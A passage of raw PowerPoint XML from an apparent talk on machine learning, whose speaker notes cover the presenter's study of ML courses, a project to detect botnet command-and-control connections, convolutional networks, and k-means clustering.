          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>So my journey started with a Microsoft Course which focused on the techniques not the math.. This was good but I was like Kevin Klein in a Fish called Wanda.  Ken even Apes read philosophy they just don’t understand it. Could read Machine learning but didn’t understand it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We were working on the project to predict connections to C&amp;C servers ( botnets ) so did course on Deep Learning from Microsoft.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>By this stage I knew I knew nothing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Did three math heavy courses from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Caltech (Introductory Machine Learning Course)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ColumbiaX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> AI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ColumbiaX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Machine Learning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>At this stage conscious incompetence but do have the background and understanding to explore specific topics which is how I developed Markov Chain classifier I showed earlier.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119676084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BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="358573768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BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2952177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166" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As you can see the convolution layers aggregates pixels where the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>relu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> layer or activation layer extracts meaningful features from those.. The pooling layer combines those into patches which then goes through the same process. The last layer is a fully connected and normally delivers a probability. For this to work the neural network is trained using 1000’s of labeled examples so it learns weights in each of the layers to correctly predict what the pixels represents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10705012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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>I choose a machine learning model ( Clustering, LDA, Gaussian Mixture Model etc)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The goal is to  learn structure or patterns in the data i.e. is some of the data similar (i.e. clustering ) or following predictable patterns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Typical applications </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>grouping similar items together i.e. log entries ( more on this later)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Finding structure in data i.e. finding common topics across a large base of documents ( more on this later)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Recommender systems i.e. which users are similar and which products or movies do they typically like</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40211216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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>I choose a machine learning model ( Clustering, LDA, Gaussian Mixture Model etc)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The goal is to  learn structure or patterns in the data i.e. is some of the data similar (i.e. clustering ) or following predictable patterns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Typical applications </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>grouping similar items together i.e. log entries ( more on this later)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Finding structure in data i.e. finding common topics across a large base of documents ( more on this later)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Recommender systems i.e. which users are similar and which products or movies do they typically like</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36070854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to make this real lets look at the difference between a discriminative and generative model… Which incidentally put you in a very small minority of people to have insight in the difference.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So what we are seeing here is data from visitors to an application. On the one axis we have aggregated session information and on the other axis we have number of pages visited. Now to the human machine learner it is obvious that there is 4 groups but the algorithm simply has 1000 data points with two values each. So question is how does the algorithm learn the groups ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10706586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166" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>One way which does not assume no structure in the data is k-means clustering. A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>surpisingly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> simple and well used model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Issue is that this is hard clustering either point belongs to one cluster or another. The points on the boundaries could belong to either but this model doesn’t cater for that.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2BEB0847-AF8B-40AF-888B-A4889A5DFCA9}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18901225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FBB5E57-3F31-0F48-9E8F-92C572FC17D8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/28/2018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11506158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FBB5E57-3F31-0F48-9E8F-92C572FC17D8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/28/2018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2523785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FBB5E57-3F31-0F48-9E8F-92C572FC17D8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/28/2018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445717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FBB5E57-3F31-0F48-9E8F-92C572FC17D8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/28/2018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16971272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FBB5E57-3F31-0F48-9E8F-92C572FC17D8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/28/2018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739050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FBB5E57-3F31-0F48-9E8F-92C572FC17D8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/28/2018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183835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FBB5E57-3F31-0F48-9E8F-92C572FC17D8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/28/2018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16362850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FBB5E57-3F31-0F48-9E8F-92C572FC17D8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/28/2018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3669493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BB5E57-3F31-0F48-9E8F-92C572FC17D8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/28/2018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18920404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FBB5E57-3F31-0F48-9E8F-92C572FC17D8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/28/2018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1733599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FBB5E57-3F31-0F48-9E8F-92C572FC17D8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/28/2018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16990148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BB5E57-3F31-0F48-9E8F-92C572FC17D8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/28/2018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05DB12-B51B-B14F-BE6F-B5F60D62B14B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10575192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5.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.jp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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11.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slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><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5.jpg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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1.emf"/></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1.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/></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27.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide15.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png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId16"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1.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId1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1.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jp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1.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18.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42.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/></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44.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/></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emf"/><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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.jp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45.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21.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png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.jpe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50.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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43.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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1.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24.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4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.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55.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.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59.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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7.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.jp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1.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide26.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.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1.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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1.emf"/></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1.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jp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jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide30.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63.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1.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide31.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64.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1.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide32.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65.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1.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide33.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66.tiff"/><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1.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34.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67.pn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1.emf"/></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68.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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70.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/></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image" Target="../media/image1.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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71.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/></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72.png"/><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1.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/><Relationship Id="rId4"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9.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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71.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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73.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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75.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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76.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/></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1.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/></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7.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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g"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.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5.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emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jp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9.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/></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5.jpg"/><Relationship Id="rId7"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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9.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slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.emf"/><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5.jpg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId9"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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5166675" y="1748406"/>
            <a:ext cx="2895600" cy="345743"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5025225" y="217333"/>
